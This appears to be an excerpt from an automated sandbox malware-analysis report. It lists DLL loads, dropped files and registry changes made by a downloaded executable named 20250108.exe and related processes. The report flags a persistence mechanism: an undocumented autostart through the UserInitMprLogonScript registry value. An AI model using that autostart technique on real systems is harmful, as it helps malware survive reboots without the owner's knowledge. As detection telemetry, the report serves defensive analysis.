Source: C:\Windows\System32\OpenWith.exe	Section loaded: thumbcache.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: slc.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: tiledatarepository.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: staterepository.core.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.staterepository.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: wtsapi32.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: windows.staterepositorycore.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: mrmcorer.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: directmanipulation.dll
Source: C:\Windows\System32\OpenWith.exe	Section loaded: textshaping.dll
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: explorerframe.dll
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: textshaping.dll
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: textinputframework.dll
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: coreuicomponents.dll
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: coremessaging.dll
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: ntmarta.dll
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: coremessaging.dll
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: wintypes.dll
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: wintypes.dll
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: wintypes.dll
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: explorerframe.dll
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: textshaping.dll
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: textinputframework.dll
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: coreuicomponents.dll
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: coremessaging.dll
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: ntmarta.dll
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: coremessaging.dll
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: wintypes.dll
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: wintypes.dll
Source: C:\Program Files\7-Zip\7zG.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: version.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: wldp.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: profapi.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: propsys.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: edputil.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: netutils.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: appresolver.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: slc.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: userenv.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: sppc.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: mpr.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: pcacli.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: version.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: napinsp.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: wshbth.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: winrnr.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: dxgi.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: dinput8.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: inputhost.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: propsys.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: devenum.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: devobj.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: msasn1.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: msdmo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\regedit.exe	Section loaded: authz.dll
Source: C:\Windows\regedit.exe	Section loaded: aclui.dll
Source: C:\Windows\regedit.exe	Section loaded: ulib.dll
Source: C:\Windows\regedit.exe	Section loaded: clb.dll
Source: C:\Windows\regedit.exe	Section loaded: uxtheme.dll
Source: C:\Windows\regedit.exe	Section loaded: ntdsapi.dll
Source: C:\Windows\regedit.exe	Section loaded: xmllite.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: version.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: wldp.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: profapi.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: propsys.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: edputil.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: netutils.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: appresolver.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: slc.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: userenv.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: sppc.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: mpr.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: pcacli.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: version.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: winmm.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: napinsp.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: wshbth.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: winrnr.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: dxgi.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: dinput8.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: inputhost.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: propsys.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Section loaded: ntmarta.dll

Source: C:\Windows\System32\OpenWith.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Program Files\7-Zip\7zG.exe	File created: C:\Users\user\Downloads\?????\20250108.exe	Jump to dropped file
Source: C:\Program Files\7-Zip\7zG.exe	File created: C:\Users\user\Downloads\?????\l.dll	Jump to dropped file
Source: C:\Users\user\Downloads\????\?????\20250108.exe	File created: C:\Users\Public\Documents\1.jpg	Jump to dropped file

Boot Survival

Creates an undocumented autostart registry key

Source: C:\Windows\regedit.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Environment UserInitMprLogonScript

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Source: C:\Users\user\Downloads\????\?????\20250108.exe

Key value created or modified: HKEY_CURRENT_USER\Console\1 d33f351a4aeea5e608853d1a56661059

Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Downloads\????\?????\20250108.exe	Process information set: NOOPENFILEERRORBOX
